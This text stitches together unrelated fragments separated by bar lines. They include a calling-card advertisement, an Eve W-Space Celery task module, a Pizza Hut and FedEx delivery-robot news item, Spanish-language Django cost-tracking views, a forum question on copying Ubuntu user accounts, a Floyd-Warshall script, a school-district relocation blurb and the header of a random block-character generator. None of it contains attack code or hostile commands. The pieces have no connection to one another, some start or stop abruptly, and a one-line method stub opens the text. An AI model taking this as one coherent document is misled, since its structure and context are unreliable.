    def visit_Determinant3x3(self, o, *args, **kwargs):
        return 14
|
The Partner calling card is a Permanent PIN phone card that provides the convenience of PIN Free Access. The easy Refill option means you need never be caught without minutes. And you get low calling prices to a lot of countries, high quality communications, Online Call History access, and the benefit of Toll Free Access Numbers. Your search for the perfect Partner ends here!
Refill phone card (add more money) anytime. Use My Account - My Permanent PINs to see Balance and Reports.
I used this card and it is indeed cheap calling card, so it will be an ideal solution for those customers who want to save, but have no desire to call less. If you have high phone bills on your mobile phone with this card you will control your costs, as minutes will be used. Afterwards, you can easily refill it.
|
# Eve W-Space
# Copyright (C) 2013 Andrew Austin and other contributors
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version. An additional term under section
# 7 of the GPL is included in the LICENSE file.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from celery import task
from django.core.cache import cache
import urllib
import json
from models import Alliance, Corporation, NewsFeed
from API import utils as handler
import eveapi
import feedparser
@task()
def update_alliance(allianceID):
    """
    Updates an alliance and its corporations from the API.
    """
    api = eveapi.EVEAPIConnection(cacheHandler=handler)
    allianceapi = api.eve.AllianceList().alliances.Get(allianceID)
    if Alliance.objects.filter(id=allianceID).count():
        # Alliance exists, update it
        for corp in allianceapi.memberCorporations:
            try:
                update_corporation(corp.corporationID)
            except AttributeError:
                # Pass on this exception because one Russian corp has an
                # unavoidable bad character in their description
                pass
        alliance = Alliance.objects.get(id=allianceID)
        alliance.name = allianceapi.name
        alliance.shortname = allianceapi.shortName
        # Check to see if we have a record for the executor
        if Corporation.objects.filter(id=allianceapi.executorCorpID).count():
            alliance.executor = Corporation.objects.get(id=allianceapi.executorCorpID)
    else:
        # Alliance doesn't exists, add it without executor, update corps
        # and then update the executor
        alliance = Alliance(id=allianceapi.allianceID, name=allianceapi.name,
                shortname=allianceapi.shortName, executor=None)
        alliance.save()
        for corp in allianceapi.memberCorporations:
            try:
                update_corporation(corp.corporationID)
            except AttributeError:
                # Same malformed-corp workaround as above (see update_corporation).
                pass
        try:
            # If an alliance's executor can't be processed for some reason,
            # set it to None
            alliance.executor = Corporation.objects.get(id=allianceapi.executorCorpID)
        except:
            alliance.executor = None
    # NOTE(review): indentation was reconstructed from flattened source; the
    # final save is taken to be common to both branches — confirm upstream.
    alliance.save()
@task()
def update_corporation(corpID, sync=False):
    """
    Updates a corporation from the API. If its alliance doesn't exist,
    update that as well.

    :param corpID: EVE corporation ID to refresh.
    :param sync: when True, do not defer to the alliance task; record the
        corp immediately (with alliance=None if unknown) so a waiting
        caller gets a Corporation back.
    :returns: the updated/created Corporation, or None when work was
        deferred to update_alliance.
    :raises AttributeError: if the corp ID is invalid or the API returns
        malformed data.
    """
    api = eveapi.EVEAPIConnection(cacheHandler=handler)
    # One known corp has a malformed character that chokes eveapi, so any
    # API failure is normalized into AttributeError (callers catch that).
    # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt pass.
    try:
        corpapi = api.corp.CorporationSheet(corporationID=corpID)
    except Exception:
        raise AttributeError("Invalid Corp ID or Corp has malformed data.")
    if corpapi.allianceID:
        try:
            alliance = Alliance.objects.get(id=corpapi.allianceID)
        except Exception:
            # The alliance isn't known yet.
            if not sync:
                # Let the alliance task create it; it will call back into
                # this task once the Alliance object exists.
                update_alliance.delay(corpapi.allianceID)
                return
            else:
                # Something is waiting and requires the corp object.
                # Record the corp with alliance=None and kick off the
                # update_alliance task to fix it later.
                alliance = None
                update_alliance.delay(corpapi.allianceID)
    else:
        alliance = None
    if Corporation.objects.filter(id=corpID).count():
        # Corp exists, update it
        corp = Corporation.objects.get(id=corpID)
        corp.member_count = corpapi.memberCount
        corp.ticker = corpapi.ticker
        corp.name = corpapi.corporationName
        corp.alliance = alliance
        corp.save()
    else:
        # Corp doesn't exist, create it. The original omitted `ticker`
        # here while the update path sets it; include it for consistency.
        corp = Corporation(id=corpID, member_count=corpapi.memberCount,
                           ticker=corpapi.ticker,
                           name=corpapi.corporationName, alliance=alliance)
        corp.save()
    return corp
@task()
def update_all_alliances():
    """
    Updates all corps in all alliances. This task will take a long time
    to run.
    """
    connection = eveapi.EVEAPIConnection(cacheHandler=handler)
    for entry in connection.eve.AllianceList().alliances:
        update_alliance(entry.allianceID)
@task()
def cache_eve_reddit():
    """
    Attempts to cache the top submissions to r/Eve.

    Fetches the subreddit's JSON listing and stores it under the
    'reddit' cache key for two minutes. If the fetch fails or returns
    an invalid payload, the previously cached data (when available) is
    re-stored instead, so readers never see garbage. The original
    fetched in two duplicated branches and, when no cache existed,
    stored whatever came back without validating it.
    """
    current = cache.get('reddit')
    try:
        data = json.loads(urllib.urlopen('http://www.reddit.com/r/Eve/top.json').read())
    except Exception:
        # Network/JSON failure: fall back to whatever we already had.
        data = None
    if data and 'data' in data:
        # Got valid response, store it
        cache.set('reddit', data, 120)
    elif current:
        # Invalid response, refresh current data
        cache.set('reddit', current, 120)
@task
def update_feeds():
    """
    Caches and updates RSS feeds in NewsFeeds.
    """
    for news_feed in NewsFeed.objects.all():
        try:
            parsed = feedparser.parse(news_feed.url)
            # Cache the parsed feed for two hours, then refresh the
            # stored title/description from the feed metadata.
            cache.set('feed_%s' % news_feed.pk, parsed, 7200)
            news_feed.name = parsed['feed']['title']
            news_feed.description = parsed['feed']['subtitle']
            news_feed.save()
        except:
            # There shouldn't be any exceptions, but we want to continue
            # if there are.
            pass
|
Pizza Hut is to start testing food delivery using an autonomous robot made by postal giant FedEx later this year, it can be revealed.
The trials are set to take place in the US in the coming months and will see the chain use FedEx’s SameDay Bot to support existing delivery staff in a bid to improve efficiency of the delivery process.
The robot is equipped with proprietary technology that allows it to navigate unpaved surfaces, curbs, and even steps to deliver a complete door-to-door delivery experience.
In recent years, Pizza Hut has emerged as a driver of innovation in the pizza category, consistently exploring technological advances designed to improve the overall customer experience.
From introducing the first way to order pizza online in 1994, to partnering with reputable leaders in technology and delivery, the chain has remained committed to incorporating technology-based solutions to better support team members and deliver a hot, fast and reliable pizza experience for customers.
Pizza Hut said the testing would take place in select markets as soon as this summer, but it was currently awaiting final city approvals.
FedEx is also working with other retailers that are interested in utilising the technology. On average, more than 60% of merchants’ customers live within three miles of a store location, demonstrating the opportunity for what it calls “on-demand, hyper-local delivery”.
The FedEx bot is being developed in collaboration with DEKA Development & Research Corp and its founder Dean Kamen, inventor of many life-changing technologies, including the iBot Personal Mobility Device and the Segway .
Pizza Hut is a subsidiary of Yum! Brands and operates over 18,000 restaurants in more than 100 countries.
|
# coding: utf-8
from functools import partial, wraps
from django.apps import apps
from django.contrib import messages
from django.core.exceptions import ImproperlyConfigured, ValidationError
from django.core.urlresolvers import reverse, reverse_lazy
from django.db import IntegrityError, models
from django.db.transaction import atomic
from django.views.generic import TemplateView, CreateView, ListView, UpdateView, DeleteView
from django.forms.utils import ErrorList
from django.forms.formsets import formset_factory
from django.http import HttpResponseRedirect
from django.utils.safestring import mark_safe
from django.shortcuts import render
from core.models import Obras, UserExtension
from parametros.models import Periodo, FamiliaEquipo
from zweb_utils.mixins import TableFilterListView, ModalViewMixin
from zweb_utils.views import LoginAndPermissionRequiredMixin
from .models import (CostoParametro, Costo, CostoTipo, AvanceObra)
from .forms import (CostoItemForm, CostoItemFamiliaForm,
CopiaCostoForm, CostoCCForm, PeriodoCCForm, PeriodoCostoTipoForm,
CostoEquipoForm, CostoEditPorCCForm, CostoEditPorEquipoForm,
AvanceObraEditForm, CentroCostoSelectForm, AvanceObraCreateForm)
from .tables import (CostoTableGeneric, CostosByCCTotalTable,
CostosByEquipoMontoHSTable, AvanceObraTable)
from .filters import CostosFilter, AvanceObraFilter
class BaseCostosMixin(LoginAndPermissionRequiredMixin):
    """Base mixin for every costos view: login plus 'can_manage_costos' required.

    ``raise_exception`` makes Django answer 403 instead of redirecting to login.
    """
    permission_required = 'costos.can_manage_costos'
    permission_denied_message = "No posee los permisos suficientes para ingresar a esa sección"
    raise_exception = True
class FormWithUserMixin(object):
    """Mixin that injects the requesting user into the form's kwargs."""

    def get_form_kwargs(self):
        # Extend the kwargs built by the parent view with the current user.
        form_kwargs = super(FormWithUserMixin, self).get_form_kwargs()
        form_kwargs.update(user=self.request.user)
        return form_kwargs
class CopiaCostosView(BaseCostosMixin, TemplateView):
    """
    View to copy costos from one period to another.

    Copies every Costo of the selected cost types from ``de_periodo`` to
    ``a_periodo``; optionally recalculates each value using the destination
    period's CostoParametro. Reports per-type outcomes via messages.
    """
    template_name = "frontend/costos/copiar_costos.html"

    def get_context_data(self, **kwargs):
        context = super(CopiaCostosView, self).get_context_data(**kwargs)
        # Only build a fresh form when the POST handler didn't pass one in.
        if 'copia_form' not in kwargs:
            context["copia_form"] = CopiaCostoForm()
        return context

    def post(self, request, *args, **kwargs):
        p_form = CopiaCostoForm(self.request.POST)
        if p_form.is_valid():
            return self.form_valid(p_form)
        else:
            return self.form_invalid(p_form)

    def form_invalid(self, p_form):
        # Re-render the page with the bound (invalid) form.
        return self.render_to_response(
            self.get_context_data(copia_form=p_form))

    def form_valid(self, form):
        tipos = form.cleaned_data["tipo_costos"]
        de_periodo= form.cleaned_data["de_periodo"]
        a_periodo = form.cleaned_data["a_periodo"]
        recalcular = form.cleaned_data["recalcular"]
        if recalcular:
            # Recalculation needs the destination period's parameters.
            try:
                des_param = CostoParametro.objects.get(periodo=a_periodo)
                # ori_param = CostoParametro.objects.get(periodo=de_periodo)
            except CostoParametro.DoesNotExist:
                messages.add_message(self.request, messages.ERROR,
                    mark_safe("Asegúrese de definir los <b><a href='{}'>parámetros "
                    "de costos</a></b> para ambos periodos seleccionados.".format(
                        reverse('admin:costos_costoparametro_changelist'))))
                return self.form_invalid(form)
        # Per-type outcome: True = copied cleanly so far, False = at least one
        # item already existed / failed validation; absent = nothing to copy.
        copia_dict = dict()
        for tipo_costo in tipos:
            # One transaction per cost type so a failure in one type does not
            # roll back the others.
            # NOTE(review): catching IntegrityError inside atomic() leaves the
            # transaction marked as broken in Django; later saves in this same
            # block may raise TransactionManagementError -- consider a nested
            # atomic() per object. Confirm before changing.
            with atomic():
                for obj in Costo.objects.filter(tipo_costo=tipo_costo, periodo=de_periodo):
                    try:
                        if tipo_costo not in copia_dict:
                            copia_dict[tipo_costo] = True
                        # Clearing the pk makes save() insert a copy.
                        obj.pk = None
                        if recalcular:
                            obj.recalcular_valor(des_param)
                        obj.periodo = a_periodo
                        obj.clean()
                        obj.save()
                    except (IntegrityError, ValidationError):
                        copia_dict[tipo_costo] = False
        for tipo_costo in tipos:
            if tipo_costo in copia_dict:
                if copia_dict[tipo_costo]:
                    messages.add_message(
                        self.request, messages.SUCCESS,
                        mark_safe("Se crearon ítems de <b>{}</b> para el periodo {}".format(tipo_costo.nombre, a_periodo)))
                else:
                    messages.add_message(
                        self.request, messages.WARNING,
                        mark_safe("Hecho! Existían previamente ítems de <b>{}</b> para el periodo {}. Puede editarlos haciendo clic <a href='{}?tipo_costo={}&periodo={}'><b>acá</b></a>.".format(
                            tipo_costo, a_periodo, reverse('costos:costos_list'), tipo_costo.pk, a_periodo.pk)))
            else:
                messages.add_message(
                    self.request, messages.WARNING,
                    mark_safe("No existen ítems de <b>{}</b> para el periodo {}".format(tipo_costo, de_periodo)))
        return HttpResponseRedirect(reverse('costos:copia_costos'))
class CostosList(BaseCostosMixin, TableFilterListView):
    """Filterable listing of Costo rows, scoped to the user's business units."""
    template_name = 'frontend/costos/costo_list.html'
    filterset_class = CostosFilter
    model = Costo

    def get_filterset(self, *args, **kwargs):
        """Only offer centros de costos belonging to the user's business unit."""
        fs = super(CostosList, self).get_filterset(*args, **kwargs)
        fs.filters['centro_costo'].field.queryset = Obras.get_centro_costos(self.request.user)
        return fs

    def get_queryset(self):
        uns = UserExtension.get_unidades_negocio(self.request.user)
        if uns.filter(codigo='OS').exclude(codigo='MS').exists():  # OS has no per-equipment costs
            return Costo.objects.filter(
                centro_costo__in=Obras.get_centro_costos(self.request.user))
        elif uns.filter(codigo='MS').exclude(codigo='OS').exists():
            # MS also sees costos not tied to any centro de costo.
            return Costo.objects.filter(
                models.Q(centro_costo__in=Obras.get_centro_costos(self.request.user)) |
                models.Q(centro_costo__isnull=True))
        # Any other combination: no restriction.
        return Costo.objects.all()

    def get_table_class(self, **kwargs):
        # Pick the table layout matching the filtered cost kind:
        # per-centro-de-costo totals vs per-equipo amount/hours.
        if self.filterset.form.is_valid():
            tipo_costo = self.filterset.form.cleaned_data["tipo_costo"]
            relacionado_con = self.filterset.form.cleaned_data["relacionado_con"]
            if tipo_costo:
                return CostosByCCTotalTable if tipo_costo.es_por_cc else CostosByEquipoMontoHSTable
            if relacionado_con:
                return CostosByCCTotalTable if relacionado_con == 'cc' else CostosByEquipoMontoHSTable
        return CostoTableGeneric

    def get_context_data(self, **kwargs):
        ctx = super(CostosList, self).get_context_data(**kwargs)
        ctx["is_filtered"] = self.filterset.form.is_valid()
        return ctx
class CostosAltaCC(BaseCostosMixin, TemplateView):
    """Bulk-create per-centro-de-costo Costo rows for one period.

    Renders one formset entry per CostoTipo related to 'cc'; rows are only
    created for the entries where a monto_total was filled in. The whole
    batch is saved atomically: any duplicate rolls everything back and the
    page re-renders with per-row errors.
    """
    model = Costo
    template_name = "frontend/costos/costos_cc_form.html"

    def _form_class(self):
        # Period + centro de costo selector (scoped to the requesting user).
        return PeriodoCCForm

    def _get_formset(self):
        return formset_factory(CostoCCForm, extra=0)

    def get_context_data(self, **kwargs):
        context = super(CostosAltaCC, self).get_context_data(**kwargs)
        context["tipos_costos"] = self.get_queryset()
        if "p_form" not in kwargs:
            context["p_form"] = self._form_class()(self.request.user)
        if "formsets" not in kwargs:
            Formset = self._get_formset()
            # One formset entry per applicable cost type.
            initial = [{'tipo_costo': x.pk} for x in context["tipos_costos"]]
            context["formsets"] = Formset(initial=initial)
        return context

    def get_queryset(self, **kwargs):
        return CostoTipo.objects.filter(relacionado_con='cc')

    def post(self, request, *args, **kwargs):
        p_form = self._form_class()(self.request.user, self.request.POST)
        formsets = self._get_formset()(self.request.POST)
        if p_form.is_valid() and formsets.is_valid():
            return self.form_valid(p_form, formsets)
        else:
            return self.form_invalid(p_form, formsets)

    def form_invalid(self, p_form, formsets):
        return self.render_to_response(self.get_context_data(p_form=p_form, formsets=formsets))

    def form_valid(self, p_form, formsets):
        """Create one Costo per filled-in row; duplicates abort the batch."""
        has_error = False
        periodo = p_form.cleaned_data["periodo"]
        centro_costo = p_form.cleaned_data["centro_costo"]
        saved_count = 0
        try:
            with atomic():
                for f in formsets:
                    # Rows without an amount are simply skipped.
                    if f.cleaned_data["monto_total"]:
                        tipo_costo = f.cleaned_data["tipo_costo"]
                        if self.model.objects.filter(
                                periodo=periodo, centro_costo=centro_costo, tipo_costo=tipo_costo).exists():
                            errors = f._errors.setdefault("monto_total", ErrorList())
                            errors.append(u"Ya existe un valor para el periodo y centro de costo seleccionado.")
                            has_error = True
                        else:
                            costo = self.model(**f.cleaned_data)
                            costo.centro_costo = centro_costo
                            costo.periodo = periodo
                            costo.save()
                            saved_count += 1
                # Raising inside atomic() rolls back every row saved above.
                if has_error:
                    raise IntegrityError
        except IntegrityError:
            return self.form_invalid(p_form, formsets)
        return self.response_result(p_form, formsets, saved_count)

    def response_result(self, p_form, formsets, saved_count):
        """Redirect with a success message, or warn when nothing was entered."""
        if saved_count:
            messages.add_message(
                self.request, messages.SUCCESS,
                "Se añadieron correctamente {} costos al centro de costos '{}' para el periodo '{}'".format(
                    saved_count, p_form.cleaned_data["centro_costo"], p_form.cleaned_data["periodo"]))
            return HttpResponseRedirect(reverse('costos:costos_alta_cc'))
        else:
            # BUGFIX: user-facing message misspelled "íngresó" -> "ingresó".
            messages.add_message(self.request, messages.WARNING, "No ingresó valores de costos")
            return self.form_invalid(p_form, formsets)
class CostosAltaEquipos(BaseCostosMixin, TemplateView):
    """Bulk-create per-familia-de-equipo Costo rows for one period/cost type."""
    template_name = "frontend/costos/costos_eq_form.html"
    # NOTE(review): form_class appears unused (the view builds its form via
    # _form_class); kept for backward compatibility.
    form_class = CostoItemForm
    model = Costo

    def _form_class(self):
        # Period + tipo de costo selector.
        return PeriodoCostoTipoForm

    def _get_formset(self):
        return formset_factory(CostoEquipoForm, extra=0)

    def get_context_data(self, **kwargs):
        context = super(CostosAltaEquipos, self).get_context_data(**kwargs)
        context["familias"] = self.get_queryset()
        if "p_form" not in kwargs:
            context["p_form"] = self._form_class()()
        if "formsets" not in kwargs:
            Formset = self._get_formset()
            # One formset entry per equipment family.
            initial = [{'familia_equipo': x.pk} for x in context["familias"]]
            context["formsets"] = Formset(initial=initial)
        return context

    def get_queryset(self, **kwargs):
        return FamiliaEquipo.objects.all()

    def post(self, request, *args, **kwargs):
        p_form = self._form_class()(self.request.POST)
        formsets = self._get_formset()(self.request.POST)
        if p_form.is_valid() and formsets.is_valid():
            return self.form_valid(p_form, formsets)
        else:
            return self.form_invalid(p_form, formsets)

    def form_invalid(self, p_form, formsets):
        return self.render_to_response(self.get_context_data(p_form=p_form, formsets=formsets))

    def form_valid(self, p_form, formsets):
        """Create one Costo per row with any amount set; roll back on duplicates.

        Saving may need the period's CostoParametro (hence the DoesNotExist
        handler below).
        """
        has_error = False
        periodo = p_form.cleaned_data["periodo"]
        tipo_costo = p_form.cleaned_data["tipo_costo"]
        saved_count = 0
        try:
            with atomic():
                for f in formsets:
                    # A row counts if any of the three amounts was entered.
                    if f.cleaned_data["monto_hora"] or f.cleaned_data["monto_mes"] or f.cleaned_data["monto_anio"]:
                        familia = f.cleaned_data["familia_equipo"]
                        if self.model.objects.filter(
                                periodo=periodo, familia_equipo=familia, tipo_costo=tipo_costo).exists():
                            errors = f._errors.setdefault("monto_hora", ErrorList())
                            errors.append(u"Ya existe un valor para el periodo y familia de equipos seleccionado.")
                            has_error = True
                        else:
                            costo = self.model(**f.cleaned_data)
                            costo.tipo_costo = tipo_costo
                            costo.periodo = periodo
                            costo.save()
                            saved_count += 1
                # Raising inside atomic() rolls back every row saved above.
                if has_error:
                    raise IntegrityError
        except CostoParametro.DoesNotExist:
            messages.add_message(
                self.request, messages.ERROR,
                mark_safe("No están definidos los <a href='{}'>parámetros de costos</a> para el "
                          "periodo {}".format(reverse('admin:costos_costoparametro_changelist'), periodo)))
            return self.form_invalid(p_form, formsets)
        except IntegrityError:
            return self.form_invalid(p_form, formsets)
        return self.response_result(p_form, formsets, saved_count)

    def response_result(self, p_form, formsets, saved_count):
        """Redirect with a success message, or warn when nothing was entered."""
        if saved_count:
            messages.add_message(
                self.request, messages.SUCCESS,
                "Se añadieron correctamente {} costos del tipo '{}' para el periodo '{}'".format(
                    saved_count, p_form.cleaned_data["tipo_costo"], p_form.cleaned_data["periodo"]))
            return HttpResponseRedirect(reverse('costos:costos_alta_eq'))
        else:
            # BUGFIX: user-facing message misspelled "íngresó" -> "ingresó".
            messages.add_message(self.request, messages.WARNING, "No ingresó valores de costos")
            return self.form_invalid(p_form, formsets)
class CargarCostosSelectView(BaseCostosMixin, TemplateView):
    """Small modal that lets the user choose which costos form to open."""
    template_name = 'frontend/costos/modal/cargar_costos_select.html'
class EditarCostosView(BaseCostosMixin, FormWithUserMixin, ModalViewMixin, UpdateView):
    """Modal edit form for a Costo; the form depends on the cost's kind."""
    model = Costo

    def get_form_class(self, **kwargs):
        # Per-centro-de-costo costs edit a total; others edit per-equipo amounts.
        return CostoEditPorCCForm if self.object.tipo_costo.es_por_cc else CostoEditPorEquipoForm

    def get_url_post_form(self):
        # The modal form posts back to this same edit endpoint.
        return reverse_lazy('costos:costos_edit', args=(self.object.pk, ))

    def get_context_data(self, *args, **kwargs):
        ctx = super(EditarCostosView, self).get_context_data(*args, **kwargs)
        ctx["modal_title"] = 'Editar %s' % self.model._meta.verbose_name
        return ctx

    def form_valid(self, form):
        obj = form.save()
        # Render a small fragment the modal uses to confirm success.
        return render(self.request, 'modal_success.html', {'obj': obj})
class EliminarCostosView(BaseCostosMixin, ModalViewMixin, DeleteView):
    """Modal view that deletes a Costo and renders a confirmation fragment."""
    model = Costo
    template_name = "modal_delete_form.html"

    def get_url_post_form(self):
        # The modal form posts back to this same delete endpoint.
        return reverse_lazy('costos:costos_delete', args=(self.object.pk, ))

    def post(self, *args, **kwargs):
        # Delete immediately and show the removed object in the success fragment.
        doomed = self.get_object()
        doomed.delete()
        return render(self.request, 'modal_delete_success.html', {'obj': doomed})
##################
# AVANCE DE OBRA #
##################
class AvanceObraList(BaseCostosMixin, TableFilterListView):
    """Filterable listing of AvanceObra rows for the user's centros de costos."""
    template_name = 'frontend/costos/avance_obra_list.html'
    filterset_class = AvanceObraFilter
    model = AvanceObra
    table_class = AvanceObraTable

    def get_filterset(self, *args, **kwargs):
        """Only offer centros de costos belonging to the user's business unit."""
        fs = super(AvanceObraList, self).get_filterset(*args, **kwargs)
        fs.filters['centro_costo'].field.queryset = Obras.get_centro_costos(self.request.user)
        return fs

    def get_context_data(self, **kwargs):
        ctx = super(AvanceObraList, self).get_context_data(**kwargs)
        ctx["is_filtered"] = self.filterset.form.is_valid()
        return ctx

    def get_queryset(self):
        # Restrict rows to centros de costos visible to the requesting user.
        return self.model.objects.filter(
            centro_costo__in=Obras.get_centro_costos(self.request.user))
class AvanceObraEditView(BaseCostosMixin, FormWithUserMixin, ModalViewMixin, UpdateView):
    """Modal edit form for an AvanceObra record."""
    model = AvanceObra
    form_class = AvanceObraEditForm

    def get_url_post_form(self):
        # The modal form posts back to this same edit endpoint.
        return reverse_lazy('costos:avances_obra_edit', args=(self.object.pk, ))

    def get_context_data(self, *args, **kwargs):
        context = super(AvanceObraEditView, self).get_context_data(*args, **kwargs)
        context["modal_title"] = 'Editar %s' % self.model._meta.verbose_name
        return context

    def form_valid(self, form):
        saved = form.save()
        return render(self.request, 'modal_success.html', {'obj': saved})
class AvanceObraDeleteView(BaseCostosMixin, ModalViewMixin, DeleteView):
    """Modal view that deletes an AvanceObra and confirms via a fragment."""
    model = AvanceObra
    template_name = "modal_delete_form.html"

    def get_url_post_form(self):
        # The modal form posts back to this same delete endpoint.
        return reverse_lazy('costos:avances_obra_delete', args=(self.object.pk, ))

    def post(self, *args, **kwargs):
        # Delete immediately and show the removed object in the success fragment.
        doomed = self.get_object()
        doomed.delete()
        return render(self.request, 'modal_delete_success.html', {'obj': doomed})
class AvanceObraCreateView(BaseCostosMixin, TemplateView):
    """Create several AvanceObra rows for one centro de costo at once."""
    model = AvanceObra
    template_name = "frontend/costos/avance_obra_create.html"
    form_class = CentroCostoSelectForm
    # At least one avance row is required; rows may be marked for deletion.
    formset_avance = formset_factory(AvanceObraCreateForm, extra=0, min_num=1, can_delete=True, validate_min=True)

    def get_context_data(self, **kwargs):
        context = super(AvanceObraCreateView, self).get_context_data(**kwargs)
        forms = {
            "obra_form": CentroCostoSelectForm(user=self.request.user, prefix='obra_form'),
            "avances_formset": self.formset_avance(prefix='avances_formset'),
        }
        # Bound forms passed through kwargs (on error) override the defaults.
        forms.update(context)
        return forms

    def post(self, request, *args, **kwargs):
        obra_form = CentroCostoSelectForm(user=self.request.user, data=self.request.POST, prefix='obra_form')
        avances_formset = self.formset_avance(self.request.POST, prefix='avances_formset')
        if obra_form.is_valid() and avances_formset.is_valid():
            return self.form_valid(obra_form, avances_formset)
        else:
            return self.form_invalid(obra_form, avances_formset)

    def form_invalid(self, obra_form, avances_formset):
        return self.render_to_response(self.get_context_data(obra_form=obra_form, avances_formset=avances_formset))

    def form_valid(self, obra_form, avances_formset):
        # All-or-nothing save: any duplicate (periodo, centro_costo) pair flags
        # an error and the raise below rolls back the whole batch.
        has_error = False
        centro_costo = obra_form.cleaned_data["centro_costo"]
        try:
            with atomic():
                for f in avances_formset.forms:
                    if f in avances_formset.deleted_forms:
                        continue
                    if self.model.objects.filter(
                            periodo=f.cleaned_data["periodo"], centro_costo=centro_costo).exists():
                        errors = f._errors.setdefault("avance", ErrorList())
                        errors.append(u"Ya existe un valor para el periodo y centro de costo seleccionado.")
                        has_error = True
                    else:
                        f.save(centro_costo)
                if has_error:
                    raise IntegrityError
        except IntegrityError:
            return self.form_invalid(obra_form, avances_formset)
        return HttpResponseRedirect(self.get_success_url(centro_costo))

    def get_success_url(self, centro_costo):
        # Side effect: queues the success message before redirecting.
        messages.success(self.request, "Avances de {} guardados correctamente.".format(centro_costo))
        return reverse_lazy('costos:avances_obra_list')
# Callable view instances exported for the URLconf.
costos_list = CostosList.as_view()
copia_costos = CopiaCostosView.as_view()
costos_alta_cc = CostosAltaCC.as_view()
costos_alta_eq = CostosAltaEquipos.as_view()
costos_select = CargarCostosSelectView.as_view()
costos_edit = EditarCostosView.as_view()
costos_delete = EliminarCostosView.as_view()
avances_obra_list = AvanceObraList.as_view()
avances_obra_edit = AvanceObraEditView.as_view()
avances_obra_delete = AvanceObraDeleteView.as_view()
avances_obra_create = AvanceObraCreateView.as_view()
|
Is there a way to copy user list (with data and passwords) from one server to another.
We have two servers, and one of them is new. I need to create the same users (those that exist in /home/) and set the same passwords (if possible); of course, the /home/ directory will also be copied over for the configs.
To be specific its Ubuntu server 10.04.1.
Not the answer you're looking for? Browse other questions tagged linux ubuntu user-management copy or ask your own question.
What are some of the pitfalls of reusing a user name in Ubuntu?
|
#!/usr/bin/env python
"""
This file is used as a module in shortest_path.py
"""
from __future__ import absolute_import
from __future__ import print_function
import re
import sys
#import random as rnd
import numpy as np
import fileinput
from six.moves import range
from six.moves import zip
def lca_table_print_matrix(M, labels, item_width=1):
    """Pretty-print the sparse matrix ``M`` (a dict keyed by (label, label)).

    One row per label; entries absent from ``M`` print as ``.``; each cell is
    right-padded to ``item_width`` characters.
    """
    for i in labels:
        for j in labels:
            key = (i, j)
            if key in M:
                # BUGFIX: look up with the same key used in the membership
                # test. The original accessed M[(str(i), str(j))] and raised
                # KeyError whenever labels were not strings.
                print("%*s" % (item_width, repr(M[key])), end=' ')
            else:
                print("%*s" % (item_width, "."), end=' ')
        print()
def tree_from_file(file_name):
    """Read a whitespace-separated adjacency matrix from ``file_name``.

    Unparseable tokens become +inf (treated as "no edge"); the diagonal is
    forced to 0. The first line fixes the vertex count.
    NOTE(review): the matrix is allocated with one extra row
    (numverts + 1, numverts) -- presumably to tolerate a trailing line in the
    input; confirm against callers before changing.
    """
    M = None
    # Note, zip makes a list sized to the smaller sequence
    i = 0
    for line in fileinput.input(file_name):
        vs = re.split(' +', line)
        if i == 0:
            # The first row determines the number of vertices.
            numverts = len(vs)
            M = np.zeros( (numverts + 1, numverts) )
        for (v,j) in zip(vs,range(0,numverts)):
            try:
                k = float(v)
            except Exception:
                # Non-numeric token -> no edge.
                k = float('+inf')
            if i == j:
                k = 0
            M[i,j] = k
        i += 1
    return M
def apsp(M):
    """All-pairs shortest paths (Floyd-Warshall), updating ``M`` in place.

    ``M[i, j]`` holds the current best distance from i to j; ``M.shape[1]``
    gives the vertex count (M may carry an extra scratch row).

    BUGFIX: the original iterated ``level`` from 1 and clamped it with
    ``min(nv - 1, level)`` (the "why the hell is this 4??" comment), so
    vertex 0 was never used as an intermediate and the last vertex was
    considered twice. The standard k-loop below fixes that.
    """
    nv = M.shape[1]
    for k in range(nv):  # intermediate vertex
        for i in range(nv):
            for j in range(nv):
                through_k = M[i, k] + M[k, j]
                if through_k < M[i, j]:
                    M[i, j] = through_k
if __name__ == '__main__':
    # CLI: read an adjacency matrix from the file named in argv[1], run
    # all-pairs shortest paths, and print the int-truncated result matrix.
    M = tree_from_file(sys.argv[1])
    apsp(M)
    numverts=M.shape[1]
    for i in range(0,numverts):
        for j in range(0,numverts):
            print(str(int(M[i,j])) + " ", end=' ')
        print()
|
When you are relocating to our area of the High Country you'll want to have a clear understanding of the school system which serves the region. Here we've provided helpful contact information to make the transfer of records and other important documents easier.
The Avery County schools are phenomenal schools and each maintains a close knit atmosphere with teachers, students and parents working together. The school system is comprised of 9 schools consisting of 6 elementary schools, 2 middle schools and 1 high school. There are 2,410 students within the Avery district and 204 teachers providing smaller class sizes to optimize each child's learning potential. Please see the list of schools below for more information on where your child might be attending.
There are also a few private schools and academies in the area that offer different curriculums and instruction. Let us help you find homes and land with stunning views that span for miles and miles. If you are thinking of relocating to the mountains, take a look at our NC Mountain Property listings and contact us today!
|
# DESCRIPTION
# Prints N variants of constructed random character sets (hard-coded but hackable: block
# characters), at X characters across and Y lines down each. Prints to either terminal or
# files; hack the global variable SAVE_TO_RND_FILENAMES to alter that; hack the other globals
# also for whatever other purposes you might have.
# SEE ALSO randomNSetChars.pde.
# DEPENDENCIES
# Python 3.8 (or maybe any 3.x version) with random and time modules installed. Moreover, python may need to be compiled with UCS2 or UCS4 support (larger text code pages support).
# USAGE
# Run from a python interpreter:
# python /path/to_this_script/randomNsetChars.py
# To pipe what is printed to a file, run for example:
# python /path/to_this_script/randomNsetChars.py > 1000000_randomNsetCharsVariants.txt
# NOTES
# - Hard-coded defaults print 1,000,000 rnd character set variations. So be prepared for a lot of noise.
# - Hack the global variables (under the GLOBALS comment) for your purposes if you wish.
# CODE
import random
from time import sleep
# GLOBALS
# Seeds the random number generator via current time:
random.seed(None, 2)
# OR you can seed with a specific number, e.g.:
# random.seed(5, 2)
# -- and it will always produce the same output, in that case.
# Pool of Unicode block/shade characters that variants are drawn from:
CHARSET = "▀▁▂▃▄▅▆▇█▉▊▋▌▍▎▏▐░▒▓▔▕▖▗▘▙▚▛▜▝▞▟■"
# When True, each variant uses a random subset of CHARSET instead of all of it:
CHOOSE_RND_SUBSET = True
